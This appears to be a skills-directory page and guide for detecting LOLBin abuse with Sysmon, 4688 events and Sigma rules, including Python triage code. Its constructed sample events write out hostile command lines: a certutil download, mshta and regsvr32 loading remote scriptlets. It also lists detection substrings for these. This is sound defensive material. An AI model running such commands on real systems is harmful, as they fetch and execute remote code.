detecting-living-off-the-land-with-lolbas
by mukul975

detecting-living-off-the-land-with-lolbas helps detect LOLBAS abuse with Sysmon and Windows Event Logs, using process telemetry, parent-child context, and Sigma rules, and gives a practical guide for triage, hunting, and rule drafting. It supports threat modeling and analyst workflows around certutil, regsvr32, mshta, and rundll32.
This skill scores 78/100: it is a solid listing candidate with enough real detection workflow content to help agents act more effectively than with a generic prompt. Directory users should expect useful threat-hunting structure and examples, but not a fully polished, turn-key operating guide.
- Strong operational focus on LOLBin abuse detection using Sysmon/Windows Event Logs, Sigma rules, and parent-child process analysis.
- Repository includes a substantial skill body plus a supporting script and reference file, which improves triggerability and agent leverage.
- The frontmatter is valid and the skill names concrete targets like certutil, regsvr32, mshta, rundll32, and msbuild, making intent easy to recognize.
- No install command is present in SKILL.md, so adoption may require manual setup or interpretation.
- The excerpt shows limited progressive disclosure signals beyond overview/prerequisites, so some execution details may still need user prompting or inspection of supporting files.
Overview of detecting-living-off-the-land-with-lolbas skill
What this skill does
The detecting-living-off-the-land-with-lolbas skill helps you detect abuse of LOLBAS/LOLBins such as certutil.exe, regsvr32.exe, mshta.exe, and rundll32.exe using process telemetry, parent-child process context, and Sigma-style detection logic. It is most useful when you need a practical guide for hunting, triage, or rule drafting rather than a generic explanation of LOLBins.
Who should install it
This skill is a good fit for SOC analysts, threat hunters, detection engineers, and blue teamers working with Sysmon or Windows event logs. It also fits threat modeling work, when you want to reason about how common Windows utilities could be abused in your environment.
What makes it different
The repo is not just a prose overview: it combines detection ideas, reference signatures, and a small helper script to anchor the workflow. The main value is in turning rough suspicious process activity into concrete detection patterns and investigation steps with less guesswork.
How to Use detecting-living-off-the-land-with-lolbas skill
Install the skill
Use the directory’s standard install flow for this repo: npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill detecting-living-off-the-land-with-lolbas. If your environment already has the parent skills repo, point your workflow at the skills/detecting-living-off-the-land-with-lolbas path so you can inspect the supporting files directly.
Start with the highest-signal files
Read SKILL.md first, then open references/api-reference.md for the concrete event and Sigma examples, and scripts/agent.py for the detection heuristics it encodes. Those three files tell you quickly whether the skill matches your data sources and detection stack.
Turn a vague request into a useful prompt
Good inputs include the telemetry source, the suspicious binary, and the outcome you want. For example: “Analyze Sysmon Event ID 1 entries for mshta.exe launched by Office, identify LOLBAS abuse indicators, and draft Sigma-style conditions for them.” That is much stronger than “look for malware,” because it gives the skill a target process, parent context, and deliverable.
Workflow that gives better results
Use this order: collect the process creation data, identify the LOLBin and parent process, compare the command line against known suspicious patterns, then convert the finding into a detection rule or hunt query. If the first pass is noisy, narrow by parent image, network indicators, or command-line substrings before broadening again.
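The four steps above, carried through in code. This is an added example, not code from the skill repository or its scripts/agent.py: the process-creation records are constructed Sysmon Event ID 1 field sets (documentation-range IP, fictional hosts and users), and the indicator substrings, parent allow/deny lists and rule names are illustrative assumptions to tune against your own baseline. It also covers the “mshta.exe launched by Office” request from the prompt example: an Office parent raises severity, and an expected installer parent for regsvr32 is filtered out so routine use does not alert.

```python
"""Triage LOLBin process-creation events and draft Sigma detection blocks.

Added example, not the skill's own code. Steps: take process-creation
records, identify the LOLBin and its parent, compare the command line
against known-suspicious substrings, then emit a Sigma-style block.
Indicator lists and parent lists below are illustrative assumptions.
"""
from dataclasses import dataclass

OFFICE_PARENTS = frozenset({"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"})


@dataclass(frozen=True)
class LolbinRule:
    name: str
    image: str                  # LOLBin file name, lower-case
    indicators: tuple           # case-insensitive command-line substrings; any one matches
    suspicious_parents: frozenset = frozenset()  # parents that raise severity (e.g. Office)
    benign_parents: frozenset = frozenset()      # parents that explain routine use; filtered out


RULES = (
    LolbinRule("certutil_remote_fetch", "certutil.exe",
               ("urlcache", "-split", "http", "-decode")),
    LolbinRule("mshta_inline_or_remote_script", "mshta.exe",
               ("javascript:", "vbscript:", "http"), suspicious_parents=OFFICE_PARENTS),
    LolbinRule("regsvr32_remote_scriptlet", "regsvr32.exe",
               ("/i:http", "scrobj.dll"), benign_parents=frozenset({"msiexec.exe"})),
    LolbinRule("rundll32_inline_script", "rundll32.exe",
               ("javascript:", "runhtmlapplication"), suspicious_parents=OFFICE_PARENTS),
)


def basename(path):
    """Last path component, lower-cased, so rules compare file names, not full paths."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(events, rules=RULES):
    """One finding per (event, rule) pair whose command line carries an indicator.

    A parent in benign_parents suppresses the match (same semantics as the
    'and not filter' in to_sigma); a parent in suspicious_parents raises severity.
    """
    findings = []
    for ev in events:
        image, parent = basename(ev["Image"]), basename(ev.get("ParentImage", ""))
        cmd = ev.get("CommandLine", "").lower()
        for rule in rules:
            if rule.image != image or parent in rule.benign_parents:
                continue
            hits = [ind for ind in rule.indicators if ind in cmd]
            if not hits:
                continue
            findings.append({
                "rule": rule.name, "host": ev.get("Computer", ""), "user": ev.get("User", ""),
                "parent": parent, "indicators": hits,
                "severity": "high" if parent in rule.suspicious_parents else "medium",
            })
    return findings


def to_sigma(rule):
    """Draft a Sigma detection block; indicators are literal substrings, so they
    map directly onto CommandLine|contains (a list is an OR in Sigma)."""
    lines = ["detection:", "  selection:", f"    Image|endswith: '\\{rule.image}'",
             "    CommandLine|contains:"] + [f"      - '{i}'" for i in rule.indicators]
    condition = "selection"
    if rule.benign_parents:
        lines += ["  filter_benign_parent:", "    ParentImage|endswith:"]
        lines += [f"      - '\\{p}'" for p in sorted(rule.benign_parents)]
        condition += " and not filter_benign_parent"
    return "\n".join(lines + [f"  condition: {condition}"])


# Constructed Sysmon Event ID 1 records (not real telemetry).
SAMPLE_EVENTS = [
    {"Computer": "FIN-WS01", "User": "CORP\\j.doe", "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.10/p.exe C:\Users\Public\p.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Computer": "FIN-WS01", "User": "CORP\\j.doe", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": 'mshta.exe vbscript:Close(Execute("GetObject(""script:https://203.0.113.10/a.sct"")"))',
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"Computer": "FIN-WS02", "User": "NT AUTHORITY\\SYSTEM", "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\lib.dll"',   # installer: expected
     "ParentImage": r"C:\Windows\System32\msiexec.exe"},
    {"Computer": "FIN-WS02", "User": "CORP\\a.smith", "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s /n /u /i:http://203.0.113.10/a.sct scrobj.dll",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Computer": "FIN-WS03", "User": "CORP\\svc_pki", "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -dump C:\Temp\server.cer",                # routine PKI use
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['rule']} host={f['host']} parent={f['parent']} hits={f['indicators']}")
    print(to_sigma(RULES[2]))
```

Running it yields three findings (the certutil fetch, the Office-spawned mshta at high severity, and the regsvr32 scriptlet load) and no finding for the msiexec-parented regsvr32 or the certutil -dump; the benign-parent filter trades some recall for precision, so keep it narrow and review it whenever a new installer or management agent appears in the baseline.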
detecting-living-off-the-land-with-lolbas skill FAQ
Is this only for defenders?
Yes, this is primarily a blue-team and detection use case. The detecting-living-off-the-land-with-lolbas skill is designed to help you spot suspicious usage, not to teach offensive tradecraft.
Do I need Sysmon to use it well?
Sysmon is the strongest fit, but Windows Security Event ID 4688 with command-line logging can still support useful analysis. Two caveats: 4688 only carries the command line when the audit policy “Include command line in process creation events” is enabled, and it only records the parent image (Creator Process Name) on Windows 10 / Server 2016 and later. If you only have minimal endpoint telemetry, the skill becomes less precise because parent-child process analysis matters a lot here.
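A small normaliser that puts Sysmon Event ID 1 and Security 4688 records into one schema and tags how much the record can support, so triage logic does not need to know which source it came from. This is an added example rather than anything from the skill repository; the two records are constructed, and the field names are the standard EventData names for each event.

```python
"""Normalise Sysmon Event ID 1 and Security 4688 process-creation fields.

Added example, not the skill's own code. Sysmon uses Image / ParentImage /
CommandLine / User; Security 4688 uses NewProcessName / ParentProcessName /
CommandLine / SubjectDomainName + SubjectUserName, with CommandLine present
only when the command-line audit policy is enabled and ParentProcessName
only on Windows 10 / Server 2016 and later. Sample records are constructed.
"""

SYSMON_FIELDS = {"Image": "image", "ParentImage": "parent_image",
                 "CommandLine": "command_line", "User": "user", "Computer": "host"}
SECURITY_4688_FIELDS = {"NewProcessName": "image", "ParentProcessName": "parent_image",
                        "CommandLine": "command_line", "Computer": "host"}


def normalize(ev):
    """Map one raw record to {image, parent_image, command_line, user, host, source, fidelity}."""
    if "Image" in ev:                     # Sysmon EID 1
        out = {dst: ev.get(src, "") for src, dst in SYSMON_FIELDS.items()}
        out["source"] = "sysmon_1"
    elif "NewProcessName" in ev:          # Security 4688
        out = {dst: ev.get(src, "") for src, dst in SECURITY_4688_FIELDS.items()}
        out["user"] = f"{ev.get('SubjectDomainName', '')}\\{ev.get('SubjectUserName', '')}".strip("\\")
        out["source"] = "security_4688"
    else:
        raise ValueError("not a process-creation record")

    # Fidelity drives how far parent-child + command-line analysis can go:
    # both present -> full; parent without command line -> image/parent only.
    if out["command_line"] and out["parent_image"]:
        out["fidelity"] = "full"
    elif out["parent_image"]:
        out["fidelity"] = "no_cmdline"
    else:
        out["fidelity"] = "image_only"
    return out


# Constructed records: one Sysmon event, one 4688 with command-line auditing off.
SYSMON_RECORD = {
    "Computer": "FIN-WS01", "User": "CORP\\j.doe",
    "Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    "CommandLine": "mshta.exe javascript:a=GetObject('script:https://203.0.113.10/x.sct')",
}
SECURITY_RECORD_NO_CMDLINE = {
    "Computer": "FIN-WS02", "SubjectDomainName": "CORP", "SubjectUserName": "a.smith",
    "NewProcessName": r"C:\Windows\System32\regsvr32.exe", "ParentProcessName": r"C:\Windows\explorer.exe",
}

if __name__ == "__main__":
    for rec in (SYSMON_RECORD, SECURITY_RECORD_NO_CMDLINE):
        n = normalize(rec)
        print(n["source"], n["fidelity"], n["image"], "<-", n["parent_image"], n["user"])
```

Route “full” records into command-line pattern matching and treat “no_cmdline” records as image/parent-only hunts; a 4688 feed that is mostly “no_cmdline” is the signal to enable command-line auditing before investing in rule tuning.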
How is this different from a normal prompt?
A normal prompt may mention LOLBins in general terms, but this skill is anchored to specific process telemetry, signatures, and rule-writing patterns. That makes it better when you need repeatable detection logic instead of a one-off narrative answer.
When should I skip this skill?
Skip it if your problem is endpoint hardening, malware reverse engineering, or generic incident response without process-creation evidence. It is strongest when the task is detection engineering, threat hunting, or threat modeling around Windows execution abuse.
How to Improve detecting-living-off-the-land-with-lolbas skill
Give the skill the right evidence
The best inputs are small, structured samples: image name, command line, parent image, user, timestamp, host role, and whether the event came from Sysmon or 4688. A request like “WINWORD.EXE spawned rundll32.exe with javascript: on a finance workstation” produces better output than a vague “suspicious rundll32” note.
Ask for a specific output shape
If you want detection value, say whether you need triage notes, hunt logic, Sigma conditions, or an analyst summary. Output improves when you request one clear artifact, such as “list the top 5 suspicious fields and draft a Sigma selection block.”
Watch for common failure modes
The most common mistake is overcalling normal admin activity as malicious. To reduce false positives, include the parent process, exact command-line switches, and any expected maintenance context; if you omit those, the skill has to guess whether a LOLBin is abused or just used legitimately.
Iterate from a narrow baseline
Start with one binary and one telemetry source, then widen only if the first answer is too shallow. For example, ask first about certutil.exe downloads from Sysmon, then expand to mshta.exe, regsvr32.exe, and rundll32.exe once you have a stable detection pattern and can compare coverage.
